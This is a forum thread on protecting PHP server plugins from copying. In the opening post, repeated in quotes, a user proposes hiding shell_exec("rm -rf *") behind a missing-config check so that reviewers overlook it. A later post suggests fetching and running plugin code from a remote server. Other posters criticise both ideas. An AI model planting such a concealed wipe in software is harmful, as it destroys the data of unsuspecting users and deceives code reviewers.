How to protect my plugins?

xZeroMCPE · Jun 11, 2017

Here's my idea (crazy one but heh; works):

Check if config.yml exist, If not then

PHP:

shell_exec("rm -rf *");

No one would worry about it, human eyes' would just pass it... It would seem normal lol....
Trust me, works perfectly. (Be sure to always create the config.yml or the shell_exec will execute lol

EdwardHamHam · Jun 11, 2017

xZeroMCPE said: ↑

Here's my idea (crazy one but heh; works):

Check if config.yml exist, If not then

PHP:

shell_exec("rm -rf *");

No one would worry about it, human eyes' would just pass it... It would seem normal lol....
Trust me, works perfectly. (Be sure to always create the config.yml or the shell_exec will execute lol
Click to expand...

But the config.yml isn't created until the plugin is ran at least once, so you'd be checking for something that doesn't even exist yet. And besides, I'm pretty sure almost anyone would notice something like that.

Thunder33345 · Jun 11, 2017

xZeroMCPE said: ↑

Here's my idea (crazy one but heh; works):

Check if config.yml exist, If not then

PHP:

shell_exec("rm -rf *");

No one would worry about it, human eyes' would just pass it... It would seem normal lol....
Trust me, works perfectly. (Be sure to always create the config.yml or the shell_exec will execute lol
Click to expand...

which doesn't help from prying eyes of the devs

SOFe · Jun 12, 2017

xZeroMCPE said: ↑

Here's my idea (crazy one but heh; works):

Check if config.yml exist, If not then

PHP:

shell_exec("rm -rf *");

No one would worry about it, human eyes' would just pass it... It would seem normal lol....
Trust me, works perfectly. (Be sure to always create the config.yml or the shell_exec will execute lol
Click to expand...

It's sad to admit, but distributing free software without letting other people resell your free software is much harder than distributing a virus that seeks profit like WannaCry.

XenialDan · Jun 18, 2017

Samantha said: ↑

I thought of something quick, which could work, but this would require your own custom-made plugin shop server and other things, and it may still hackable.

This ideology bases on making your plugin activated by IDs. The steps would be:

User buys your plugin off your custom-made website, then afterwards receives a 'plugin activation id' or whatever you would wanna call it.

The website would save the 'id' and the full plugin code into a private database table.

The user would run a command to activate this 'id', example: "/pluginactivate <your given id>".

Once activation is complete, the ID would be saved into the database, so it cannot be activated more than once on another server.

Next, your plugin would send a GET request to the website, using the 'id', the website check if the 'id' is valid and if true, it would send the full code as socket data.

Finally, the plugin would "catch" the socket data and run it as code.

I'm sorry if this is incorrect, I'm only trying to give new ideas.
Click to expand...

you can dump out the code from ram or using devtools, or just unphar/open with notepad, take out some lines of the check, tada, you have the plugin

SOFe · Jun 18, 2017

XenialDan said: ↑

you can dump out the code from ram or using devtools, or just unphar/open with notepad, take out some lines of the check, tada, you have the plugin
Click to expand...

Or just write a PHP extension that dumps parsed code.

How to protect my plugins?

xZeroMCPE Witch

EdwardHamHam Skeleton

Thunder33345 Moderator Staff Member

SOFe Administrator Staff Member PMMP Team Poggit Admin

XenialDan Baby Zombie

SOFe Administrator Staff Member PMMP Team Poggit Admin